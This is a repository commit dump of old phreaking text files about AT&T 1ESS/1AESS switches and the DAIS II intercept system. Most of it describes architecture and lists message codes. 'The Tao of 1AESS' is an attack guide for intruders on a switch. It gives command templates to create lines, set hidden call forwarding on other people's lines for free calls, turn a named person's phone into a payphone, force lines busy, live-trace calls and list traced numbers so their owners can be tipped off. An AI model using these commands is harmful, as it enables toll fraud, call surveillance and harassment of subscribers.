Initial commit

This commit is contained in:
root@procul
2021-04-15 13:31:59 -05:00
commit 278a90f7ce
57951 changed files with 34606208 additions and 0 deletions
+185
View File
@@ -0,0 +1,185 @@
<-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><->
<-> <->
<-> ESS1 & 1A Switching Systems <->
<-> <->
<-> Researched and Compiled by <->
<-> -=+NINJA MASTER+=- <->
<-> <->
<-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><->
<-> "Forever Servicing The Phreak/Hack Community" <->
<-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><->
Hello, and welcome to the first in a continuing series on the ESS1 and 1A
switching systems. The information in this series had been obtained from my
knowledge and by trashing various empire (AT&T,BELL) trash binns.
In this first file I will start off with a very basic review of what the
ESS system is, and will then go on to talk about some other things you
will find interesting.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The ESS System In Review
------------------------
ESS (Which stands for Electronic Switching System) was designed by good old AT&T
in the state of the art labs of the computer-controlled space-division. The
principle is simple, you have a switching system that is controlled by simple
electronics and stored computer programs. (not to be confused with CCIS which is
just a interoffice command link).
The ESS system is a class 5(End Office) system, and has some spinoffs (like the
No. 10A RSS [Remote Switching System]). It uses digital transmissions, although
they must be converted to analog by a hybrid as this is what kind of electronics
AT&T chose to use.
The ESS is divided in to seperate modules, so as to make repairs and additions
easier. Each module is connected to the system by interfaces (one of which will
be covered later). In a whole, the ESS system provides the standard BORSCHT
functions, plus some extra ones.
Well, them there's the basics, now on with the good, technical, informational,
fun stuff.........
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ESS1A Procesor
--------------
The follwing is about the 1A Processor, and will give you an understanding on
how it functions.
The 1A processor is used for a number of ESS systems, but most specifically is
used for the following:
o To control the 4 ESS switch.
o To control the 1A ESS switch.
o To be added to older 1 ESS switches, so as to update it to a 1A ESS.
o To support future switching systems.
o To accommodate bulk memory systems.
o And to provide real time and continuous control through highly automatic
maintenance. (less than 2 hours downtime in 40 years continuous operation).
The 1A processor uses stored programs, and operates in a real time environment.
The processor can function without being hooked up to the switching network.
The processor is devoted to internal maintenance and administrative tasks. So
TELCO employe's can monitor the processor (from now on called the 1A) it is
hooked up to control panels and to I/O terminals. (which, incidentally
interface with software defined I/O channels).
All frames (they make up the 1A) sent out from the 1A are duplicated.
So that a failure from one won't screw up and equipment.
The following is a high level block diagram of the 1A:
_________
|Attached |
|Processor|_________
|System | |
--------- |
|
| ___________
___________ | | |
| | ^ | Auxiliary |
| File Store|----< <-------------------*-----------------| Data |
| | | | System |
----------- | | |
| -----------
|
|
| AU BUS
|
|
___________ __________|_________ ____________
| | | | | |
| Program | PS Bus | Central | CS Bus | Call Store |
| Store |---------------| Control |-------------| |
| | | | ------------
----------- ----------|---------
|
| PU Bus ___________ Data and
| | | control
*------------| I/O |-------------
| | Interface | to/from
| | | I/O
| ----------- terminals
| |
| |
| |E2A Telemetry
| PU Bus |Control
| |
Status | |
_________ And ________|_______ |
| | Control | |<---------- Pu Bus To/From
| Control |-------------------| Periphel |--------------------------using
| Panels | | System | system
| | | Interface | peripheal
--------- | |
| | E2A Telemetry Control Inhibit
to No. 2 Telemetry Data | |<----------------------\
SCCS And Control | | | From
Maintenance-------------------| |<--Office--Alarms-------|Using
Facility | | |System
| |<--Building--Alarms----/
| |
----------------
LEGEND
------
AU--Auxiliary Unit
CS--Call Store
PS--Program Store
PU--Peripheral Unit
SCCS--Switching Control Center System
About the above:
Central Control: Interfaces with the 1A, and performs the processing functions
of the 1A. It also executes all maintenance routines.
Program Store: High speed semiconductor that stores program instructions, and
system configuration system.
Call Store: Similar to the above, but is used for storage translation data, and
frequently changed call processing data, such as:
o Status of trunks and switching network.
o Records of network terminations used for each call in progress.
o Digits received and digits to be outpulsed.
o Maintenance data related to programmed diagnostic tests.
Call store also includes an emergency system recovery program, used to
establish a working system of a program store failure.
File Store: Magnetic disk memory, used for program backup.
Attached Processor System: 3B20D computer, of which one or more are used as
slave processors (used for multitasking, ect.)
Auxillary Data System: Magnetic tape system used to store and retrieve data
such as system reinitialization, memory dumps, ect......
I/O interface: Used to connect 1A to terminals used to input control mesages,
and to recieve status messages.
Peripheral System Interface: Serves as the main junction between all peripherals.
Control Panels: An additional I/O device used to monitor the 1A, and to
exercise manual control over the 1A.
Downloaded From P-80 Systems 304-744-2253
+127
View File
@@ -0,0 +1,127 @@
1AESS Common Input Msgs
FM03 Error rate of specified digroup
FM04 Digroup out of frame more than indicated
FM05 Operation or release of the loop terminal relay
FM06 Result of digroup circuit diagnostics
FM07 Carrier group alarm status of specific group
FM08 Carrier group alarm count for digroup
FM09 Hourly report of carrier group alarms
FM10 Public switched digital capacity failure
FM11 PUC counts of carrier group errors
** MAINTENANCE **
MA02 Status requested, print out of MACII scratch pad
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system
MA05 Maintenance interrupt count for last hour
MA06 Scanners,network and signal distributors in trouble
MA07 Successful switch of duplicated unit (program store etc.)
MA08 Excessive error rate of named unit
MA09 Power should not be removed from named unit
MA10 OK to remove paper
MA11 Power manually removed from unit
MA12 Power restored to unit
MA13 Indicates central control active
MA15 Hourly report of # of times interrupt recovery program acted
MA17 Centrex data link power removed
MA21 Reports action taken on MAC-REX command
MA23 4 minute report, emergency action phase triggers are inhibited
** MEMORY **
MN02 List of circuits in trouble in memory
** NETWORK TROUBLE **
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble Trunk to Line
NT03 Network path trouble Line to Line
NT04 Network path trouble Trunk to Trunk
NT06 Hourly report of network frames made busy
NT10 Network path failed to restore
** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS Call store status
OP:DUSTATUS Data unit status
OP:ERAPDATA Error analysis database output
OP:INHINT Hourly report of inhibited devices
OP:LIBSTAT List of active library programs
OP:OOSUNITS Units out of service
OP:PSSTATUS Program store status
** PLANT MEASUREMENTS **
PM01 Daily report
PM02 Monthly report
PM03 Response to a request for a specific section of report
PM04 Daily summary of IC/IEC irregularities
** REPORT **
REPT:ADS FUNCTION Reports that a ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
REPT:ADS PROCEDURAL ERROR You fucked up
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL System programs that are off or on
REPT:RC CENSUS Hourly report on recent changes
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
** RECENT CHANGE **
RC18 RC message response
** REMOVE **
RMV Removed from service
** RESTORE **
RST Restored to service status
** RINGING AND TONE PLANT **
RT04 Status of monitors
** SOFTWARE AUDIT **
SA01 Call store memory audit results
SA03 Call store memory audit results
** SIGNAL IRREGULARITY **
SIG IRR Blue box detection
SIG IRR INHIBITED Detector off
SIG IRR TRAF Half hour report of traffic data
** TRAFFIC CONDITION **
TC15 Reports overall traffic condition
TL02 Reason test position test was denied
TL03 Same as above
** TRUNK NETWORK **
TN01 Trunk diagnostic found trouble
TN02 Dial tone delay alarm failure
TN04 Trunk diag request from test panel
TN05 Trunk test procedural report or denials
TN06 Trunk state change
TN07 Response to a trunk type and status request
TN08 Failed incoming or outgoing call
TN09 Network relay failures
TN10 Response to TRK-LIST input, usually a request from test position
TN11 Hourly, status of trunk undergoing tests
TN16 Daily summary of precut trunk groups
** TRAFFIC OVERLOAD CONDITION **
TOC01 Serious traffic condition
TOC02 Reports status of less serious overload conditions
** TRANSLATION ** (shows class of service, calling features etc.)
TR01 Translation information, response to VFY-DN
TR03 Translation information, response to VFY-LEN
TR75 Translation information, response to VF:DNSVY
** **
TW02 Dump of octal contents of memory
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
Downloaded From P-80 International Information Systems 304-744-2253
+595
View File
@@ -0,0 +1,595 @@
-=-
-= The Tao of 1AESS =-
-=-=-=-=-=-=-=-=
-= DeadKat&Disorder =-
-=-
Special thanks to Gatsby and Mark Tabas
Introduction
-=-=-=-=-=-=
The Bell System's first trial of electronic swithcing took place in
Morris,
Illinois, in 1960. The Morris trial culminated a 6-year development and
proved the viability of the stored-program control concept. The first
application of electronic local switching in the Bell System occurred in
May
1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
The 1ESS swithcing system was designed for use in areas where large
numbers
of lines and lines with heavy traffic (primarily business customers) are
served. The system has generally been used in areas serving between
10,000
and 65,000 lines and has been the primary replacement system for urban
step-by-step and panel systems. The ease and flexibility of adding new
services made 1ESS switching equipment a natural replacement vehicle in
city applications where the demand for new, sophisticated business and
residence services is high.
In 1976, the first electronic toll switching system to operate a digital
time-division switching network under stored-program control, the 4ESS
system, was placed in service. It used a new control, the 1A processor,
for the first time to gain a call carrying capacity in excess of 550,000
busy-hour calls. The 1A processor was also designed for local switching
application. It doubled the call-carrying capacity of the 1ESS switching
system and was introduced in 1976 in the first 1AESS switch. The network
capacity of 1ESS switching equipment was also doubled to allow the 1AESS
switch to serve 130,000 lines.
In addition to local telephone service, the 1AESS switches offer a
variety
of special services. Custom Local Area Switching Services (CLASS) are
available as well Custom Calling Services. Business customers may select
offerings such as centrex, ESS-ACS, Enhanced Private Switched
Communications
Service, or electronic tandem switching.
Although more modern switches like 5ESS and DMS 200 have been developed,
it
is estimated that some 50 percenct of all switches are still 1AESS.
Commands
-=-=-=-=
The 1AESS uses a command line interface for all commands. The commands
are
divided into three fields: action, identification, and data. The fields
are always seperated by a colon. Every command is terminated by either a
period for verification commands or a 'ballbat' (!) for change commands.
The control-d is used to execute the command instead of a return. The
underscore is used as a backspace. Commands are always type in 'all
caps'.
The action field is the first field of the command and is ended by a
colon.
The identification field is ended by the second colon. The
identification
field has one or two subfields which are seperated by a semicolon.
Semicolons
are not used elsewhere in the command. The data field consists of
keyword
units and is the remaining portion of the command.
Basic Machine Commands
-=-=-=-=-=-=-=-=-=-=-=
These commands provide useful information from the system. The WHO-RV-
command will tell you what CO it is and what version of the OS is
installed.
If your ouput is scrolling off the screen press space to end scrolling.
The V-STOP- command will clear the buffer.
WHO-RV-. System information.
SPACE Stops ouput from scrolling.
V-STOP-. Free buffer of remaining LENS/INFO.
Channel Commands
-=-=-=-=-=-=-=-=
Channel commands are used to redirect input and output. If a switch
won't
respond to a command use the OP:CHAN command to check on current channel.
If your channel is not responding, use the MON:CHAN command to switch
output
and control to your terminal (the remote). RC commands cannot be
performed
without the ALW command. You can check the status of the RC with the
RCCENSUS command.
OP:CHAN:MON! Shows all channels which are being monitored.
MON:CHAN SC1;CHAN LOC! Redirect output to remote screen.
STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen.
(This command needs to be done after you
are finished)
OP:RCCENSUS! To see recent change status.
Tracing Commands
-=-=-=-=-=-=-=-=
CI-LIST- will give you a list of all numbers which are being traced
externally. It will not show you lines which are being traced only at
this switch.
CI-LIST-. Traced line list.
Check Features on Line
-=-=-=-=-=-=-=-=-=-=-=
The VF command is used to check the current settings on a line.
The DN XXXXXXX specifies the phone number of the line you wish to check.
Replace XXXXXXX with the seven digit phone number of the line you are
checking.
VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line.
VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features
Call Features CWT- Call Waiting
CFB- Call Forward Busy - Busy=VM
CFV- Call Forwarding Variable
CFD- Call Forward Don't answer
TWC- Three Way Calling
TTC- Touch Tone
RCY- Ring Cycle
SC1- Speed Calling 1
SC2- Speed Calling 2
UNA- No Long Distance
PXX- Block all LD service (guess)
MWI- Message Waiting Indicator
CHD- centrix(unremarkable)
CPU- centrix(unremarkable)
CLI- Calling Line Identification (CID)
ACB- Automatic Call Back Feature (?)
BLN- Special Toll Billing
MDN
NSQ
FRE- Free Calling
SEQ
The standard output of a command appears below. The 'DN 348 2141'
specifies
the number you are checking. The calling features will be listed on the
second line by their three letter acronyms. This line has call waiting
(CWT), a trace (TRC), and touch tone dialing (TTC).
M 53 TR75 2 DN 348 2141 00000003
CWT TRC TTC
Searching For Free Lines
-=-=-=-=-=-=-=-=-=-=-=-=
The VFY command can be used to check if a line is in use. The output
will
list the LEN (Line Equipment Number) for the line and its call features
in
octal. If the LEN is all zeros, then that number has not been assigned.
Replace XXXXXXX with the number you wish to check. You must prefix the
phone number with 30. You can also check for unused LEN's using the VFY
command. Use the space bar to stop scrolling and the V-STOP command to
cancle when looking up free LEN's.
VFY-DN-30XXXXXXX. Search for free lines.
VFY-LEN-4100000000. List all free LENs.
VFY-TNN-XXXXXXXX. To get information on trunk.
The output for the VFY-DN command will appear like the one below. Notice
that this number has been assigned a LEN so it is in use.
M 06 TR01 796 9146
0 0 0 0
LEN 01 025 000
001 000 000 000 000 000 4
000 000 000 000 000 000 000 000
0 0 0 0
0 0 0 0 0
Searching for a Paticular Feature on a Line (trace)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
All line information is stored in the switch for its coverage area. The
switch is like a huge database in this sense. You can do global searches
on the switch for any feature. One especially interesting feature to
search
for are traced numbers. Traced numbers listed this way are INTERNALLY
traced as opposed to globally traced numbers shown with the CI-LIST-
command.
Global and internal trace lists are always very different. And remember,
be a good samaritan and call the person being traced and let them know!
;-)
VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area
with
trace on it (takes a sec).
You can exmatch for any LASS feature by replacing the keyword TRACE with
any
call feature like call forwarding (CFB) and speed calling (SC1).
To See What Numbers Are on a Speed Calling List
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Another nice use for the VFY command is to see what is on a line's speed
calling list. Replace XXXXXXX with the target phone number. One devious
use is to look at the CO's speed call list to find other internal telco
numbers.
VFY-LIST-09XXXXXXX020000
09=mask 02=single list (one digit speed calling)
20=double list (two digit speed calling)
28= " "
36= " "
44= " "
To Build a Line
-=-=-=-=-=-=-=-
The recent change command (RC) is used to create and modify lines.
Because
RC commands are usually very long and complex, they are typed on multiple
lines to simplify them. Each subfield of the data section of the command
is
typed on a seperate line ended by a slash (\) followed by pressing
ctrl-d.
To create a line, you specify LINE in the identification field. Before
a line can be created, you must first locate an unused number by using
the
VFY-DN command explained above. Once a free number has been found, you
use the VFY-LEN to find an available LEN. To build a new line, follow
these steps:
First, find spare LEN (VFY-LEN-4100000000.). Next find free line. Now
type
in the RC commands using the following commands as a template:
RC:LINE:\ (create a line)
ORD 1\ (execute the command immediately)
TN XXXXXXX\ (telephone number)
LEN XXXXXXXX\ (len found from above)
LCC 1FR\ (line class code 1fr)
CFV\ (call forward)
XXX 288\ (type XXX, space, then the three digit PIC)
ld carrier - 222 - MCI
288 - AT&T
333 - Sprint, etc.)
! (BEWM, don't forget the ctrl-d!!)
(Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE
has taken affect)
Creating Call Forwarding Numbers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The call forwarding feature is the most important feature for hackers.
By
creating a line or modifying an existing line with call forwarding, you
can
than use it to make free phone calls. You set the line to call forward/
no ring and then give it the call forwarded number. This will allow you
to call the modified line and be instantly forwarded to your pre-chosen
destination.
First create a line using RC:LINE:, then modify the line using the
following
commands as a template.
RC:CFV:\ (add call forwarding to a line)
ORD 1\ (execute the command immediately)
BASE XXXXXXX\ (base number you are changing)
TO XXXXXXX\ (local - XXXXXXX : ld - XXXXXXXXXX )
PFX\ (set prefix to 1 if ld)
! (BEWM)
To Change Call Forward Number
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
It is safer to modify an existing call forward than to create a new line
soley for this purpose. You can use the VFY command and EXMATCH for CFB
to
find lines with call forwarding. Before you can change the call
forwarding
'TO' number you must delete the old one. Remove call forward number
using
CFV:OUT with the template below.
RC:CFV;OUT:\ (remove call forward number)
ORD 1\ (execute command immediately)
BASE XXXXXXX\ (number to remove it from)
! (Yeeee-Hahhhahah)
Make Call Forward Not Ring
-=-=-=-=-=-=-=-=-=-=-=-=-=
The only drawback to call forwarding off someone's line is if rings they
might answer. To get around this, you add the call-forward no-ring
option
(ICFRR) using the following as a template.
RC:LINE;CHG:\ (recent change line to be specified)
ORD 1\ (execute command immediately)
TN XXXXXXX\ (number you wanna fuck with)
ICFRR\ (this takes the ring off)
! (Go!)
Adding a feature to a line
-=-=-=-=-=-=-=-=-=-=-=-=-=
The RC:LINE;CHG: can also be used to add any other call feature. Use the
same template but change the feature.
RC:LINE;CHG:\ (this is used for changing features)
ORD 1\ (order number)
TN XXXXXXX (telephone number you are fucking with)
TWC\ (replace this with any feature you wish)
! (Fire!)
Removing a Feature
-=-=-=-=-=-=-=-=-=
Use the NO delimiter to remove a feature from a line.
RC:LINE;CHG:\ (change a feature)
ORD 1\ (effective immediately)
TN XXXXXXX\ (telephone number)
CFV NO\ (feature followed by NO)
!
Change Phone number into payphone
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
You've read about in the Hacker Crackdown, now you too can be 31337 and
change Gail Thackery's phone into a payphone. In fact you can change the
line class code (LCC) to anything you want. To display the LCC of a line
use the following and replace the XXXXXXX with the line you wish to view.
VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code)
DTF = Payphone
1FR = Flat Rate
1MR = Measured Rate
1PC = One Pay Phone
CDF = DTF Coin
PBX = Private Branch Exchange
CFD = Coinless(ANI7) Charge-a-call
INW = InWATS (800!@#)
OWT = OutWATS
PBM = O HO/MO MSG REG (NO ANI)
PMB = LTG = 1 HO/MO (Regular ANI6)
(ani6 and ani7 - only good for DMS)
To change the line into a payphone use the RC:LINE;CHG command and modify
the LCC like the example below.
RC:LINE;CHG;\ (this is used for changing features)
ORD 1\ (order number)
TN XXXXXXX\ (telephone number you are fucking with)
LCC DTF\ (line class code you are changing to)
! (Make it so.)
*(may have to remove features when doing this)*
To Kill a Line and Remove It Permanently
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
If you need to delete a line you have created (or haven't) use the
following
syntax.
RC:LINE;OUT:\ (remove line)
ORD 1\ (effective immediately)
TN XXXXXXX\ (on this number)
! (GO!)
Monitoring Phone Calls
-=-=-=-=-=-=-=-=-=-=-=
There are powerful utilities to monitor calls and affect phone lines
available on a 1A. The T-DN- commands allow you to check the current
status of line and make it busy or idle. If a line happens to be active
you can use the NET-LINE- command to trace the call and find the numbers
for both calling parties.
T-DN-RD XXXXXXX. See if call in progress.
ouput: =1 line busy
=0 line idle
T-DN-MB XXXXXXX. Make line busy.
T-DN-MI XXXXXXX. Make line idle.
NET-LINE-XXXXXXX0000. To do a live trace on a phonenumber thru
switch.
NET-TNN-XXXXXX Same as above for trunk trace
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=
Appendix 1 - Common output messages seen on 1A switches
-=-=-=-=-=
** ALARM **
AR01 Office alarm
AR02 Alarm retired or transferred
AR03 Fuse blown
AR04 Unknown alarm scan point activated
AR05 Commercial power failure
AR06 Switchroom alarm via alarm grid
AR07 Power plant alarm
AR08 Alarm circuit battery loss
AR09 AMA bus fuse blown
AR10 Alarm configuration has been changed (retired,inhibited)
AR11 Power converter trouble
AR13 Carrier group alarm
AR15 Hourly report on building and power alarms
** AUTOMATIC TRUNK TEST **
AT01 Results of trunk test
** CARRIER GROUP **
CG01 Carrier group in alarm
CG03 Reason for above
** COIN PHONE **
CN02 List of pay phones with coin disposal problems
CN03 Possible Trouble
CN04 Phone taken out of restored service because of possible coin fraud
** COPY **
COPY Data copied from one address to another
** CALL TRACE **
CT01 Manually requested trace line to line, information follows
CT02 Manually requested trace line to trunk, information follows
CT03 Intraoffice call placed to a number with CLID
CT04 Interoffice call placed to a number with CLID
CT05 Call placed to number on the CI list
CT06 Contents of the CI list
CT07 ACD related trace
CT08 ACD related trace
CT09 ACD related trace
** DIGITAL CARRIER TRUNK **
DCT COUNTS Count of T carrier errors
** MEMORY DIAGNOSTICS **
DGN Memory failure in cs/ps diagnostic program
** DIGITAL CARRIER "FRAME" ERRORS **
FM01 DCT alarm activated or retired
FM02 Possible failure of entire bank not just frame
FM03 Error rate of specified digroup
FM04 Digroup out of frame more than indicated
FM05 Operation or release of the loop terminal relay
FM06 Result of digroup circuit diagnostics
FM07 Carrier group alarm status of specific group
FM08 Carrier group alarm count for digroup
FM09 Hourly report of carrier group alarms
FM10 Public switched digital capacity failure
FM11 PUC counts of carrier group errors
** MAINTENANCE **
MA02 Status requested, print out of MACII scratch pad
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system
MA05 Maintenance interrupt count for last hour
MA06 Scanners,network and signal distributors in trouble
MA07 Successful switch of duplicated unit (program store etc.)
MA08 Excessive error rate of named unit
MA09 Power should not be removed from named unit
MA10 OK to remove paper
MA11 Power manually removed from unit
MA12 Power restored to unit
MA13 Indicates central control active
MA15 Hourly report of # of times interrupt recovery program acted
MA17 Centrex data link power removed
MA21 Reports action taken on MAC-REX command
MA23 4 minute report, emergency action phase triggers are inhibited
** MEMORY **
MN02 List of circuits in trouble in memory
** NETWORK TROUBLE **
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble Trunk to Line
NT03 Network path trouble Line to Line
NT04 Network path trouble Trunk to Trunk
NT06 Hourly report of network frames made busy
NT10 Network path failed to restore
** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS Call store status
OP:DUSTATUS Data unit status
OP:ERAPDATA Error analysis database output
OP:INHINT Hourly report of inhibited devices
OP:LIBSTAT List of active library programs
OP:OOSUNITS Units out of service
OP:PSSTATUS Program store status
** PLANT MEASUREMENTS **
PM01 Daily report
PM02 Monthly report
PM03 Response to a request for a specific section of report
PM04 Daily summary of IC/IEC irregularities
** REPORT **
REPT:ADS FUNCTION Reports that a ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
REPT:ADS PROCEDURAL ERROR You fucked up
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL System programs that are off or on
REPT:RC CENSUS Hourly report on recent changes
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel
inhibited)
** RECENT CHANGE **
RC18 RC message response
** REMOVE **
RMV Removed from service
** RESTORE **
RST Restored to service status
** RINGING AND TONE PLANT **
RT04 Status of monitors
** SOFTWARE AUDIT **
SA01 Call store memory audit results
SA03 Call store memory audit results
** SIGNAL IRREGULARITY **
SIG IRR Blue box detection
SIG IRR INHIBITED Detector off
SIG IRR TRAF Half hour report of traffic data
** TRAFFIC CONDITION **
TC15 Reports overall traffic condition
TL02 Reason test position test was denied
TL03 Same as above
** TRUNK NETWORK **
TN01 Trunk diagnostic found trouble
TN02 Dial tone delay alarm failure
TN04 Trunk diag request from test panel
TN05 Trunk test procedural report or denials
TN06 Trunk state change
TN07 Response to a trunk type and status request
TN08 Failed incoming or outgoing call
TN09 Network relay failures
TN10 Response to TRK-LIST input, usually a request from test position
TN11 Hourly, status of trunk undergoing tests
TN16 Daily summary of precut trunk groups
** TRAFFIC OVERLOAD CONDITION **
TOC01 Serious traffic condition
TOC02 Reports status of less serious overload conditions
** TRANSLATION ** (shows class of service, calling features etc.)
TR01 Translation information, response to VFY-DN
TR03 Translation information, response to VFY-LEN
TR75 Translation information, response to VF:DNSVY
** **
TW02 Dump of octal contents of memory
Trace Output Appearance (Customer COT)
A 03 CT04 22 03 02 05 11 26 359 757 0617
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+262
View File
@@ -0,0 +1,262 @@
AIS - Automatic Intercept System
The DAIS II System by Computer Consoles Incorporated
INTRODUCTION...
~~~~~~~~~~~~~~~
Computer Consoles Incorporated (CCI) manufactures various hardware
appliances to be used in conjunction with phone companies switches as well as
other aspects of the companies' uses, plus computer systems such as their own
Unix-supporting systems.
DAIS II is the Distributed Automatic Intercept System, which is the
system used to announce if the subscriber has dialed a non-working number.
This is what you hear, in action, when you dial a wrong number and get the 3
tones plus the announcement or the ONI (Operator Number Identification)
intercept operator ("What number did you dial?").
The information from this file comes mostly from an instructional
manual sent to me by CCI, who can be reached at 800-833-7477 or 716-482-5000
directly, or may be written to at 97 Humbolt Street, Rochester, NY, 14609.
INTERCEPTION
~~~~~~~~~~~~
Most definitely any person who has used a telephone in his life has,
by some means or another, come across the dreaded 3 tones, leading up to the
ever-so-cumbersome announcement telling of the disconnected or non-working
number. This file will go into how the whole system works.
After dialing the non-working number, the telco's Class 5 End Office
routes the call to DAIS II.
ANI Calls
~~~~~~~~~
Provided that the End Office has Automatic Number Identification
(ANI) equipment, the equipment then identifies the digits of the called number
and sends them to the intercept system.
The system receives the called number from the end office, retrieves
information for that number from the intercept database, formulates the
message, and delivers it to the customer in an automated announcement. These
announcements can either be standardized or tailored to the independent
telephone companies' needs. If further assistance is required, the caller can
then stay on the line and wait for an operator to come onto the line.
ONI Calls
~~~~~~~~~
When the End Office is primitive, and they don't have the ANI
equipment to do the above ritual, operators are directly involved. These
operators are also called into action when there is an ANI or DAIS II failure.
When the ONI (Operator Number Identification) call comes in, DAIS II
routes the call to the operator. The operator asks for the number that the
customer called and then keys it into her KDT (Keyboard Display Terminal).
After she hits the command key, the number's information is searched for in
the intercept database, the message is formulated, and the automated response
is announced. Once again, if the caller needs further assistance, an operator
will return to the line to help the subscriber.
Operators will return to the line for any number of reasons. They
include the following:
Unsuccessful Searches - After DAIS II receives the called number from ANI
equipment or from an operator, it searches the
database to find the intercept message associated with
the telephone number. The database contains all
10,000 line numbers for each exchange in the calling
area. If the system cannot complete the search, the
number was either keyed in incorrectly or there is a
problem in the system. The call is then routed to an
operator and displays the intercepted number
(including NPA) on the KDT screen along with a message
indicating why the search could not be completed. If
the number was keyed in wrong, the operator will
correct the number, or else she will ask the
subscriber to re-dial the number.
Aborted Announcements - If a search is given successful but for one reason or
another the automated announcement cannot be given,
the call is routed to an operator. The KDT display
shows the intercepted number, the appropriate
information for a verbal response, and the message,
"VERBAL REPORT." In this case, the operator quotes
the message to the caller rather than activating the
automated response.
Reconnects - If a customer remains on the line for more information
after receiving the automated announcement, the system
routes the call to an operator. The operator's KDT
display shows the called number plus other pertinent
information given to the caller in the previous
announcement. From here, the operator can respond
verbally to the customer's needs, or activate the
automated system again. The DAIS II system allows up
to 4 reconnects per call, but the possible number of
reconnects available ranges from 0-3. With 1
reconnect, the operator must report verbally.
Split Referrals - If a number has been changed but replaced with two
numbers, this is called a "split referral." When the
database finds 2 or more numbers, the DAIS II system
routes the customer to an operator, displaying the old
number and new listings on the KDT screen. The
operator then asks which number they are looking for
and keys in the command key to activate the
announcement, or else they do the announcement
verbally.
Operator Searches
~~~~~~~~~~~~~~~~~
Situations may arise where the subscriber needs more information
than was given by the automated announcement, or believes the information to
be invalid. DAIS II provides for operators to have access to both the
intercept and the DA databases at all times as long as the system
administrator, who judges the extent to which operators can use the
cross-search capability, allows it.
Components Of The System
~~~~~~~~~~~~~~~~~~~~~~~~
The telco's Class 5 End Offices contain switching equipment that
routes calls to DAIS II. If the office has ANI equipment, the switch routes
the called digits to the intercept system in the form of multi-frequency
tones. The end offices route calls to DAIS II on dedicated (direct) trunks.
These direct trunks can carry ANI traffic or ONI traffic, but not both.
If trunk concentrators are used, the concentrator trunks to DAIS II
may carry ANI calls, ONI calls, or both, depending on the types of trunks
coming into the concentrators from the end offices. The call is identified as
ANI or ONI through MF tones transmitted by the concentrators.
If an operator must be involved (due to ONI or further assistance),
DAIS II routes the call to the telco's ACD (Automatic Call Distributor), which
is a switching device that routes calls to any available operator.
The intercept data base resides on disk in the ARS (Audio Response
System). ARS processors known as Audio Response Controllers (ARCs) search the
intercept database. If a call requires an operator's services, the Marker
Decoder Unit (MDU) provides ACD routing information to the ARC.
The DAIS II Automatic Intercept Communications Controllers (AICCs)
route messages between the ARCs and the DAIS II subsystems. An intercept
subsystem that is housed at the same location as the database is called a
Colocated Automated Intercept System (CAIS). A subsystem located at a
distance from the database is known as a Local Automated Intercept System
(LAIS). Each subsystem can provide automated announcements without using
expensive trunking to route ANI calls to a centralized intercept office. Only
calls that require operator assistance are routed on trunks to the ARS site.
Because those trunks are only held white the operator identifies the number
and are released before the announcement begins, trunk requirements are
reduced. The automated announcement is always given by the intercept
subsystem.
Each CAIS or LAIS site contains a Trunk Time Switch (TTS) and DAIS II
Audio Response Units (DARUs). Intercept trunks from the concentrators and the
Class 5 End Offices terminate at the TTS. When an ONI call comes in on one of
these trunks, the TTS routes it to the ACD. When an ANI call comes in, the
TTS routes the called number to the ARC. After the ARC retrieves the
appropriate message from the database, it sends that information back to the
TTS, which connects a DARU port to the trunk on which the call came in. Then,
the DARU produces an automated announcement of the message and delivers it to
the caller. ARS hardware generates only DA announcements whereas DAIS II
hardware generates only intercept announcements.
Automatic Intercept Communications Controller (AICC)
